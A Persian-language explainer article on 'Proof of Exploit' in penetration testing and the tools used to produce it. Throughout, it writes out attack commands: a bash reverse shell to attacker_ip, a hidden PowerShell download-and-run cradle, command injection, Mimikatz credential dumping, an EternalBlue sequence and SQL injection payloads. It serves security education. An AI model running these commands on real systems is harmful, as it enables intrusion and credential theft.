Proof of Exploit (PoE): اثبات عملی بهرهبرداری از آسیبپذیریها در امنیت سایبری

در دنیای امنیت سایبری، شناسایی و بهرهبرداری از آسیبپذیریها یکی از مهمترین مراحل در تست نفوذ، تحقیقات امنیتی و تحلیل تهدیدات است. Proof of Exploit (PoE) یا «اثبات بهرهبرداری» به مدرکی اشاره دارد که نشان میدهد یک آسیبپذیری خاص بهطور موفقیتآمیز مورد سوءاستفاده قرار گرفته است. برخلاف Proof of Concept (PoC) که صرفاً نشان میدهد یک آسیبپذیری قابل بهرهبرداری است، PoE تأیید میکند که یک مهاجم یا تستکننده امنیت توانسته است از آن سوءاستفاده کند و تأثیر واقعی آن را مشاهده نماید. این مفهوم برای متخصصان امنیت اطلاعات، تیمهای پاسخ به حوادث و تحلیلگران تهدیدات اهمیت زیادی دارد، زیرا به آنها کمک میکند تا میزان خطر یک آسیبپذیری را بهتر درک کرده و اقدامات مناسبی برای مقابله با آن انجام دهند.
PoE معمولاً شامل شواهدی مانند دسترسی به یک سیستم، اجرای دستورات غیرمجاز، استخراج دادههای حساس یا تغییرات در سیستم هدف است. این شواهد از طریق ابزارهای مختلفی مانند Metasploit, Cobalt Strike, Mimikatz و سایر فریمورکهای تست نفوذ جمعآوری میشوند. ارائه یک Proof of Exploit معتبر میتواند به سازمانها کمک کند تا تهدیدات امنیتی را جدیتر بگیرند و اقدامات اصلاحی مؤثری انجام دهند. از سوی دیگر، PoE در ارزیابی میزان تأثیرگذاری آسیبپذیریها در دنیای واقعی و طراحی راهکارهای مقابلهای نیز کاربرد دارد. در این مقاله، به بررسی اهمیت، روشهای ایجاد و ابزارهای مورد استفاده در تولید PoE میپردازیم.
تفاوت بین Proof of Concept (PoC) و Proof of Exploit (PoE)
در حوزه امنیت سایبری، Proof of Concept (PoC) و Proof of Exploit (PoE) دو مفهوم کلیدی هستند که به بررسی و تأیید آسیبپذیریهای امنیتی کمک میکنند. بااینحال، تفاوتهای مهمی بین این دو وجود دارد که درک آنها برای متخصصان امنیت اطلاعات و تیمهای تست نفوذ بسیار حیاتی است.
۱. تعریف و هدف
- PoC (اثبات مفهوم): یک PoC معمولاً یک کد یا روش تئوری است که نشان میدهد یک آسیبپذیری وجود دارد و ممکن است قابل سوءاستفاده باشد. هدف اصلی آن، تأیید وجود یک آسیبپذیری بدون اجرای یک حمله واقعی است.
- PoE (اثبات بهرهبرداری): در مقابل، یک PoE نشان میدهد که یک حمله واقعی انجام شده و بهرهبرداری از آسیبپذیری بهطور موفقیتآمیز صورت گرفته است. هدف PoE ارائه شواهدی از سوءاستفاده عملی از یک ضعف امنیتی است.
۲. سطح تأثیر و ریسک
- PoC: نشان میدهد که یک تهدید بالقوه وجود دارد اما تأثیر واقعی آن مشخص نیست، زیرا اغلب در محیطهای کنترلشده و بدون اجرای واقعی حمله استفاده میشود.
- PoE: اثبات میکند که یک سیستم هدف در برابر حمله آسیبپذیر است و میزان ریسک واقعی را نشان میدهد. این میتواند شامل دستیابی به سطح دسترسی بالاتر، سرقت دادهها یا تغییرات مخرب در سیستم باشد.
۳. استفاده در تست نفوذ و امنیت
- PoC: معمولاً توسط محققان امنیتی، توسعهدهندگان نرمافزار و تیمهای امنیتی برای بررسی آسیبپذیری و اصلاح آن قبل از بهرهبرداری توسط مهاجمان استفاده میشود.
- PoE: توسط تیمهای تست نفوذ، هکرهای اخلاقی و تحلیلگران تهدیدات برای اثبات عملی بهرهبرداری از یک آسیبپذیری و ارائه گزارشهای امنیتی به سازمانها مورد استفاده قرار میگیرد.
۴. سطح پیچیدگی و اجرا
- PoC: میتواند یک اسکریپت ساده، تغییر در درخواستهای HTTP، یا یک توضیح تئوری باشد که نشان میدهد آسیبپذیری قابل بهرهبرداری است.
- PoE: معمولاً شامل کدهای پیچیدهتر، اجرای حملات عملی، دریافت دسترسی غیرمجاز، یا استخراج دادهها از سیستم هدف است.
۵. نمونههای عملی از PoC و PoE
مثال از PoC (اثبات وجود آسیبپذیری RCE)
فرض کنید یک سرور تحت وب دارای آسیبپذیری Remote Code Execution (RCE) است. یک محقق امنیتی میتواند یک درخواست ساده ارسال کند تا بررسی کند که آیا اجرای کد از راه دور ممکن است یا خیر:
curl -X POST "http://vulnerable.site/exploit" -d "cmd=id"
اگر سرور پاسخ دهد:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
این نشان میدهد که سرور احتمالاً آسیبپذیر است، اما هنوز ثابت نشده که این آسیبپذیری در یک حمله واقعی قابل بهرهبرداری است.
مثال از PoE (اثبات سوءاستفاده عملی از آسیبپذیری RCE)
در ادامه مثال بالا، یک مهاجم PoE را ایجاد میکند که یک reverse shell برای کنترل سیستم هدف به او میدهد:
مهاجم در ماشین خود یک listener اجرا میکند:
nc -lvnp 4444
سپس از طریق سرور آسیبپذیر، یک اتصال معکوس برقرار میکند:
curl -X POST "http://vulnerable.site/exploit" -d "cmd=bash -i >& /dev/tcp/attacker_ip/4444 0>&1"
نتیجه:
مهاجم یک شل روی سیستم قربانی دریافت میکند، که نشان میدهد آسیبپذیری بهطور کامل قابل سوءاستفاده است. این یک Proof of Exploit محسوب میشود.
جمعبندی
معیار | PoC (اثبات مفهوم) | PoE (اثبات بهرهبرداری) |
---|---|---|
هدف | تأیید وجود آسیبپذیری | اثبات بهرهبرداری موفق |
میزان تأثیر | نشان دادن یک امکان بالقوه | تأثیر واقعی و عملی سوءاستفاده |
استفاده | تحقیقات امنیتی، تستهای اولیه | تست نفوذ، تحلیل تهدیدات |
پیچیدگی | ساده، معمولاً بدون اجرای حمله | پیچیده، شامل اجرای حمله عملی |
شواهد | کد نمونه، توضیح تئوری، لاگهای اولیه | دسترسی غیرمجاز، تغییر در سیستم، استخراج دادهها |
بهطور کلی، PoC اولین مرحله از اثبات یک آسیبپذیری است، درحالیکه PoE آخرین مرحله از اثبات بهرهبرداری و اثبات واقعی ریسک امنیتی محسوب میشود.
کاربردهای PoE
- تست نفوذ (Penetration Testing): اثبات اینکه حملهای موفقیتآمیز بوده است.
- هک اخلاقی (Ethical Hacking): ارائه مدرک به مشتریان یا مدیران برای نشان دادن میزان خطر.
- پاسخ به حادثه (Incident Response): بررسی اینکه آیا یک سیستم به خطر افتاده است یا نه.
- تحلیل بدافزار (Malware Analysis): اثبات اینکه یک کد مخرب چگونه از آسیبپذیری بهرهبرداری میکند.
روشهای ایجاد Proof of Exploit (PoE)
ایجاد Proof of Exploit (PoE) نیازمند بهرهبرداری موفق از یک آسیبپذیری و ارائه شواهدی مستند از تأثیر آن است. بسته به نوع آسیبپذیری، روشهای مختلفی برای ایجاد PoE وجود دارد. در اینجا به برخی از مهمترین روشهای مورد استفاده در تست نفوذ و تحلیل تهدیدات پرداختهایم:
۱. دریافت دسترسی شل (Shell Access)
یکی از رایجترین روشها برای ایجاد PoE، به دست آوردن دسترسی شل (Shell Access) روی سیستم هدف است. این روش معمولاً در آسیبپذیریهای Remote Code Execution (RCE)، Command Injection و Privilege Escalation استفاده میشود.
نمونه: اجرای یک Reverse Shell از طریق RCE
در این روش، مهاجم یک reverse shell روی سیستم هدف اجرا کرده و کنترل آن را از راه دور به دست میآورد.
مهاجم یک listener روی سیستم خود اجرا میکند:
nc -lvnp 4444
اجرای یک reverse shell روی سیستم آسیبپذیر:
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
نتیجه:
مهاجم یک PoE معتبر ارائه میدهد که نشان میدهد سیستم هدف کاملاً قابل کنترل است.
۲. اجرای دستورات در سیستم هدف (Command Execution)
در برخی موارد، دریافت شل ممکن است غیرممکن یا غیرضروری باشد. در این روش، مهاجم از اجرای یک دستور ساده برای اثبات بهرهبرداری استفاده میکند.
نمونه: تأیید اجرای کد از طریق آسیبپذیری Command Injection
فرض کنید یک فرم ورود دارای آسیبپذیری Command Injection است. مهاجم میتواند دستور whoami
را برای بررسی سطح دسترسی اجرا کند:
curl -X POST "http://vulnerable.site/login" -d "username=admin; whoami"
نتیجه:
root
خروجی نشان میدهد که اجرای کد در سیستم هدف امکانپذیر است، که یک PoE معتبر محسوب میشود.
۳. تغییر در سیستم هدف (System Modification)
گاهی برای اثبات بهرهبرداری، تغییرات محسوسی در سیستم هدف ایجاد میشود. این روش بیشتر در حملات Privilege Escalation یا Web Exploits به کار میرود.
نمونه: ایجاد یک فایل برای اثبات بهرهبرداری از یک آسیبپذیری
echo "Exploited by Attacker" > /tmp/exploit_proof.txt
نتیجه:
مهاجم اثبات میکند که توانسته روی سیستم هدف تغییر ایجاد کند.
۴. استخراج اطلاعات حساس (Credential Dumping & Data Exfiltration)
در برخی سناریوها، مهاجم بهجای اجرای کد یا گرفتن شل، اطلاعات حساس را استخراج میکند تا PoE را ارائه دهد. این اطلاعات میتواند شامل هشهای رمز عبور، توکنهای احراز هویت، یا فایلهای حساس باشد.
نمونه: استفاده از Mimikatz برای استخراج رمزهای عبور
mimikatz.exe "sekurlsa::logonpasswords" exit
نتیجه:
لیست رمزهای عبور به مهاجم نمایش داده میشود که نشاندهنده بهرهبرداری موفق است.
۵. ثبت لاگها و اسکرینشاتها
برخی PoEها شامل اسکرینشاتهای مرتبط با حمله هستند. این روش بیشتر در تست نفوذ برنامههای تحت وب و مهندسی اجتماعی استفاده میشود.
نمونه: اثبات نفوذ از طریق دسترسی به پنل ادمین
اگر مهاجم موفق به ورود به یک پنل مدیریتی شود، میتواند یک اسکرینشات از صفحه داشبورد بگیرد و بهعنوان PoE ارائه دهد.
۶. ایجاد یک کانال ارتباطی مخرب (C2 Communication)
در حملات پیشرفته، مهاجم برای اثبات بهرهبرداری یک ارتباط C2 (Command & Control) با سیستم هدف برقرار میکند.
نمونه: برقراری ارتباط C2 با استفاده از Empire
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker_ip/payload.ps1')"
نتیجه:
یک session در سرور مهاجم برقرار شده و کنترل دستگاه هدف امکانپذیر میشود.
۷. سوءاستفاده از آسیبپذیریهای وب (Web Exploits)
در حملات تحت وب، اثبات بهرهبرداری معمولاً شامل دریافت کوکیهای نشست (Session Hijacking)، اجرای اسکریپت در سایت (XSS)، یا دریافت اطلاعات از پایگاه داده (SQL Injection) است.
نمونه: اثبات بهرهبرداری از SQL Injection
' UNION SELECT null, username, password FROM users --
نتیجه:
مهاجم اطلاعات کاربران را استخراج کرده و بهعنوان PoE ارائه میدهد.
روشهای ایجاد Proof of Exploit (PoE) بسته به نوع آسیبپذیری متفاوت است. برخی از رایجترین روشها شامل:
✅ دریافت شل از راه دور (Reverse Shell)
✅ اجرای دستورات در سیستم هدف
✅ ایجاد تغییرات در سیستم برای تأیید بهرهبرداری
✅ استخراج اطلاعات حساس مانند رمزهای عبور و هشها
✅ ثبت لاگها و اسکرینشاتهای مربوط به نفوذ
✅ ایجاد ارتباط C2 برای کنترل سیستم هدف
✅ بهرهبرداری از آسیبپذیریهای تحت وب (SQLi, XSS, etc.)
هر PoE باید شواهد مستند و قابل استناد ارائه دهد تا اثبات کند که یک آسیبپذیری واقعاً در محیط عملیاتی قابل سوءاستفاده است.
ابزارهای مفید برای ایجاد Proof of Exploit (PoE)
ایجاد Proof of Exploit (PoE) نیازمند ابزارهای قدرتمندی است که بتوانند آسیبپذیریها را شناسایی، بهرهبرداری کرده و شواهدی از سوءاستفاده موفق ارائه دهند. در اینجا به برخی از مهمترین ابزارهای مورد استفاده در تست نفوذ و تحلیل امنیتی میپردازیم.
۱. Metasploit Framework
🔹 نوع: فریمورک تست نفوذ
🔹 کاربرد: بهرهبرداری از آسیبپذیریها، ایجاد PoE با استفاده از ماژولهای آماده
🔹 مثال: اجرای اکسپلویت برای آسیبپذیری SMB (EternalBlue
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker_ip> exploit
🔹 نتیجه: ایجاد یک reverse shell برای کنترل سیستم هدف و ارائه PoE.
۲. Cobalt Strike
🔹 نوع: ابزار حملات پیشرفته و C2
🔹 کاربرد: ایجاد ارتباط مخفی با سیستم هدف، اجرای اکسپلویتها، استخراج اطلاعات
🔹 ویژگی کلیدی: ایجاد Beacon برای کنترل دستگاههای آلوده و دریافت اطلاعات حیاتی برای PoE.
🔹 مثال: اجرای یک ماژول PowerShell در سیستم هدف
powershell-import Invoke-Mimikatz.ps1 powershell Invoke-Mimikatz -Command privilege::debug sekurlsa::logonpasswords
🔹 نتیجه: استخراج اطلاعات ورود کاربران بهعنوان PoE.
۳. Mythic C2
🔹 نوع: ابزار Command & Control (C2)
🔹 کاربرد: بهرهبرداری، اجرای کد مخرب، مدیریت نشستهای حمله
🔹 ویژگی کلیدی: قابلیت اجرای حملات post-exploitation و ثبت شواهد نفوذ
🔹 نتیجه: ایجاد یک کانال ارتباطی پایدار با سیستم هدف برای کنترل از راه دور و جمعآوری اطلاعات PoE.
۴. Mimikatz
🔹 نوع: ابزار سرقت اطلاعات احراز هویت
🔹 کاربرد: استخراج رمزهای عبور، توکنها و هشهای ورود از سیستمهای ویندوزی
🔹 مثال: اجرای Mimikatz برای استخراج هشهای NTLM
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
🔹 نتیجه: نمایش لیست نامهای کاربری و رمزهای عبور بهعنوان PoE برای سرقت اعتبارنامهها.
۵. BloodHound
🔹 نوع: ابزار تحلیل مسیرهای حمله در اکتیو دایرکتوری
🔹 کاربرد: شناسایی مسیرهای Privilege Escalation برای ارائه PoE
🔹 ویژگی کلیدی: نمایش مسیرهای سوءاستفاده از دسترسیهای کاربران و سیستمها
🔹 نتیجه: تولید نقشهای از ارتباطات بین کاربران و سرورها که نشان میدهد چگونه مهاجم میتواند سطح دسترسی خود را افزایش دهد.
۶. Burp Suite
🔹 نوع: ابزار تست امنیت وب
🔹 کاربرد: شناسایی و بهرهبرداری از آسیبپذیریهای تحت وب مانند SQL Injection، XSS و CSRF
🔹 مثال: بهرهبرداری از SQL Injection برای استخراج اطلاعات کاربران
' UNION SELECT username, password FROM users --
🔹 نتیجه: نمایش نامهای کاربری و رمزهای عبور که بهعنوان PoE قابل استفاده هستند.
۷. SQLmap
🔹 نوع: ابزار خودکار برای شناسایی و بهرهبرداری از SQL Injection
🔹 کاربرد: استخراج دادههای حساس از پایگاه داده برای PoE
🔹 مثال: استخراج نامهای کاربری از یک پایگاه داده آسیبپذیر
sqlmap -u "http://target.com/login.php?id=1" --dump
🔹 نتیجه: نمایش اطلاعات کاربری که نشاندهنده سوءاستفاده موفق از آسیبپذیری است.
۸. Empire C2
🔹 نوع: فریمورک post-exploitation و C2
🔹 کاربرد: اجرای کدهای مخرب، کنترل سیستمهای آلوده، استخراج دادهها
🔹 مثال: دریافت اطلاعات کاربران در سیستم هدف
usemodule credentials/mimikatz/dump_credentials execute
🔹 نتیجه: نمایش اطلاعات ورود کاربران برای اثبات PoE.
۹. Responder
🔹 نوع: ابزار حمله به پروتکلهای شبکه (SMB، LLMNR، NBT-NS)
🔹 کاربرد: رهگیری و استخراج هشهای رمز عبور از طریق حملات MITM
🔹 مثال: اجرای Responder برای شنود درخواستهای احراز هویت
responder -I eth0
🔹 نتیجه: دریافت هشهای رمز عبور و ارائه آنها بهعنوان PoE از یک حمله شبکهای.
۱۰. Veil-Evasion
🔹 نوع: ابزار دور زدن آنتیویروس
🔹 کاربرد: ایجاد بدافزارهای غیرقابلشناسایی برای تست نفوذ
🔹 مثال: تولید یک payload مخفی برای بهرهبرداری
veil -t Evasion
🔹 نتیجه: اجرای موفق بدافزار در سیستم هدف که میتواند بهعنوان PoE از دور زدن مکانیزمهای امنیتی باشد.
✅ Metasploit → بهرهبرداری از آسیبپذیریها و اجرای کد مخرب
✅ Cobalt Strike / Mythic C2 → کنترل سیستمهای آلوده و اجرای حملات پیشرفته
✅ Mimikatz → استخراج رمزهای عبور برای اثبات سوءاستفاده از سیستم
✅ Burp Suite / SQLmap → اثبات بهرهبرداری از آسیبپذیریهای وب
✅ BloodHound → تحلیل مسیرهای افزایش دسترسی در Active Directory
✅ Responder → سرقت هشهای رمز عبور از طریق حملات شبکهای
✅ Veil-Evasion → تولید بدافزار برای تست نفوذ و عبور از آنتیویروس
این ابزارها به هکرهای اخلاقی، متخصصان امنیت و محققان کمک میکنند تا PoEهای قابل استناد ارائه دهند و تأثیر واقعی آسیبپذیریها را به سازمانها نشان دهند.
مثال از PoE در یک سیستم آسیبپذیر
فرض کنید سیستمی دارای آسیبپذیری Remote Code Execution (RCE) باشد. یک مهاجم میتواند از طریق اجرای کد مخرب به سیستم دسترسی پیدا کند.
مرحله ۱: بهرهبرداری از آسیبپذیری
curl -X POST "http://vulnerable.site/exploit" -d "cmd=id"
مرحله ۲: دریافت تأیید سوءاستفاده
uid=0(root) gid=0(root) groups=0(root)
این خروجی نشان میدهد که مهاجم موفق به اجرای کد شده است.
نتیجهگیری و خلاصه مقاله
در این مقاله، مفهوم Proof of Exploit (PoE) بهعنوان مدرک عملی سوءاستفاده از آسیبپذیریهای امنیتی مورد بررسی قرار گرفت. برخلاف Proof of Concept (PoC) که صرفاً امکانپذیری بهرهبرداری از یک آسیبپذیری را نشان میدهد، PoE شواهدی مستند از بهرهبرداری موفق ارائه میدهد که میتواند شامل دریافت دسترسی غیرمجاز، استخراج اطلاعات حساس، اجرای دستورات بر روی سیستم هدف، یا تغییر در پیکربندیهای امنیتی باشد.
مروری بر نکات کلیدی مقاله:
1️⃣ تفاوت بین PoC و PoE:
- PoC: نشان میدهد که یک آسیبپذیری از لحاظ تئوری قابل بهرهبرداری است اما لزوماً سوءاستفاده عملی را ثابت نمیکند.
- PoE: ثابت میکند که یک آسیبپذیری واقعاً مورد سوءاستفاده قرار گرفته و اثرات آن قابل مشاهده است.
2️⃣ روشهای ایجاد PoE:
- دریافت دسترسی شل (Shell Access) با اجرای reverse shell
- اجرای دستورات در سیستم هدف برای اثبات آسیبپذیری
- ایجاد تغییرات در فایلها یا پیکربندی سیستم بهعنوان مدرک سوءاستفاده
- استخراج اطلاعات حساس مانند هشهای رمز عبور، توکنها و کوکیهای احراز هویت
- ثبت لاگها و اسکرینشاتها از فعالیتهای انجامشده
- برقراری ارتباط C2 برای کنترل از راه دور سیستمهای آلوده
- سوءاستفاده از آسیبپذیریهای وب مانند SQL Injection و XSS
3️⃣ ابزارهای مفید برای ایجاد PoE:
- Metasploit Framework برای بهرهبرداری از آسیبپذیریها
- Cobalt Strike / Mythic C2 برای کنترل سیستمهای آلوده
- Mimikatz برای استخراج رمزهای عبور و توکنهای احراز هویت
- BloodHound برای شناسایی مسیرهای افزایش دسترسی در Active Directory
- Burp Suite / SQLmap برای اثبات بهرهبرداری از آسیبپذیریهای وب
- Responder برای استخراج هشهای رمز عبور از طریق حملات شبکهای
اهمیت PoE در امنیت سایبری
✅ برای تیمهای امنیتی و تست نفوذ، ارائه PoE باعث میشود که سازمانها آسیبپذیریهای خود را جدیتر بگیرند و اقدامات لازم را برای اصلاح آنها انجام دهند.
✅ برای تحلیلگران تهدیدات و محققان امنیتی، ارائه PoE به آنها کمک میکند تا میزان ریسک واقعی یک آسیبپذیری را ارزیابی کرده و از انتشار اطلاعات نادرست جلوگیری کنند.
✅ برای مهاجمان (هکرهای کلاهسیاه)، PoE بهعنوان مدرکی برای اثبات بهرهبرداری موفق از یک سیستم یا برنامه استفاده میشود که میتواند برای فروش در بازارهای زیرزمینی قرار گیرد.
جمعبندی نهایی
PoE یکی از مهمترین مفاهیم در دنیای امنیت سایبری است که نشان میدهد یک آسیبپذیری نهتنها قابل سوءاستفاده است، بلکه در شرایط واقعی به بهرهبرداری رسیده است. استفاده از روشهای مناسب و ابزارهای قدرتمند برای ایجاد PoE میتواند به متخصصان امنیت در درک عمیقتر تهدیدات کمک کرده و سازمانها را در اتخاذ تدابیر امنیتی بهتر یاری کند. با توجه به پیچیدگی حملات امروزی، داشتن یک PoE قوی میتواند تفاوت بین یک تهدید بالقوه و یک نفوذ واقعی را مشخص کند.
مطالب زیر را حتما بخوانید
-
آینده امنیت سایبری: آیا هوش مصنوعی شغلهای امنیت سایبری را از بین خواهد برد؟
39 بازدید
-
حمله Unconstrained Delegation: تهدیدات، نحوه عملکرد و روشهای پیشگیری
38 بازدید
-
حملات Typosquatting: تهدید پنهان دنیای سایبری و راههای مقابله با آن
37 بازدید
-
بدافزارهای Infostealer: جاسوسان دیجیتالی که اطلاعات شما را سرقت میکنند!
47 بازدید
-
راهنمای جامع John the Ripper: ابزار تخصصی کرک پسورد و تست امنیت
54 بازدید
-
راهنمای کامل Hashcat: ابزاری قدرتمند برای کرک پسورد
79 بازدید
دیدگاهتان را بنویسید
برای نوشتن دیدگاه باید وارد بشوید.